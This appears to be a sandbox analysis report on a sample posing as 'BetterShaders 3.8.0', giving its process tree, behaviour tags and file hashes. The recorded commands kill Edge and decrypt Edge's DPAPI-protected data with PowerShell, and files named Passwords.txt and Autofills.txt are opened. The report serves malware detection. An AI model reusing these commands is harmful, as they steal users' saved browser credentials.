C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:12⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5472 /prefetch:82⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6124 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:12⤵PID:3408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:12⤵PID:1968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:1860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:12⤵PID:5560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5216 /prefetch:82⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5764
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1620
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5084
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5172
-
C:\Users\Admin\Downloads\7z2406-x64.exe"C:\Users\Admin\Downloads\7z2406-x64.exe"1⤵
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5132
-
C:\Users\Admin\Downloads\7z2406-x64.exe"C:\Users\Admin\Downloads\7z2406-x64.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5612
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4044
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BetterShaders_3.8.0.rar"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3972 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO48F8DC98\README.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2068
-
-
C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe"C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exeC:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"3⤵PID:712
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"3⤵PID:3576
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,8799931206630392598,803552106916620795,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1592 /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2196,i,8799931206630392598,803552106916620795,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:33⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1992
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Autofills.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4512
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\resources\elevate.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\resources\elevate.exe"1⤵
- Executes dropped EXE
PID:1524
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2464
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,13456782259732191707,11733681510408839646,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2028 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2248,i,13456782259732191707,11733681510408839646,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2288
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Passwords.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2540
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\LICENSE.electron.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3200
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD57ec019d8445f4dcdb91a380c9d592957
SHA115fd8375e2e282a90d3df14041272e5ac29e7c93
SHA2561cc179f097ee439bb35a582059cbc727d9cea0d5c43dfaa57f9f03050cfaea03
SHA512d71a79091fcc6a96c24d95662a18cc24145b9531145ef0bcb4e882c12f5bb5ca6c7a9b9e50024c9c0bf4cb6bf40dca7627cecbfddd637142d04a194e1956ae9b
-
Filesize
1.8MB
MD51939f878ae8d0cbcc553007480a0c525
SHA1df9255af8e398e72925309b840b14df1ae504805
SHA25686926f78fad0d8c75c7ae01849bf5931f4484596d28d3690766f16c4fb943c19
SHA512a5e4431f641e030df426c8f0db79d4cef81a67ee98e9253f79c1d9e41d4fc939de6f3fd5fc3a7170042842f69be2bb15187bf472eeaaf8edd55898e90b4f1ddd
-
Filesize
960KB
MD55764deed342ca47eb4b97ae94eedc524
SHA1e9cbefd32e5ddd0d914e98cfb0df2592bebc5987
SHA256c5c7ad094ad71d8784c8b0990bf37a55ffc7c7ab77866286d77b7b6721943e4f
SHA5126809130394a683c56a0245906d709b2289a631f630055d5e6161b001e216d58045d314b0148512d8c01f0c2bf5f9f16e93fa7d61ab3d24beab4f9c3d4db13c18
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
152B
MD5ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA2565009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998
-
Filesize
152B
MD5f53207a5ca2ef5c7e976cbb3cb26d870
SHA149a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA25619ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD54db0b47676452570056c0828a8e59c31
SHA1b12562304264ad08fa1d58fdd7a5e86554059ea3
SHA25652d87d3fe7f85e4f4af0b9ca4b91fb88af775b3d4541b498cb158b969d14d33e
SHA512a82db71540b05358c57849c293ee757e14d61322212e096af75d4160e2fe9fd2bade32c458583788aafce245bbf9d4d0b7a15a1382c1576613878888210803d3
-
Filesize
387B
MD50e1525b2f5e39cf3ab99f408635491fc
SHA14084ad5dbe90a340f490a9543adc54714c213df8
SHA256d3ed45f98f2f4ea670db04f0a7b76f91259ab575addba63a59c2226be26ace3c
SHA512b6d30587f19af0e5c12cc3ef4be37fa4258b3679f5e62ccffb402838933837f034136bb31a7361e7a6e7520a412bec8d42f540771bd75e915c4fdc24742bd157
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
813B
MD55e21d3ca71e11ace5bef4c88a7ac2159
SHA1f25d891546f91b00bc2251de2a99f45b10d7c3b3
SHA256e78f268b3ce7b6f0e4c9f12222978f035205ed12a7aeb711d24808757adc60c6
SHA512ae6986ae7ce6c7f30a0ec1cf814920f4e92419e963f2162c4a00d10e9de0ebcd99f92ebd0f28c89e9156cbeb49501bcba463d63692e8d6921bab95cf671ac2fe
-
Filesize
111B
MD5807419ca9a4734feaf8d8563a003b048
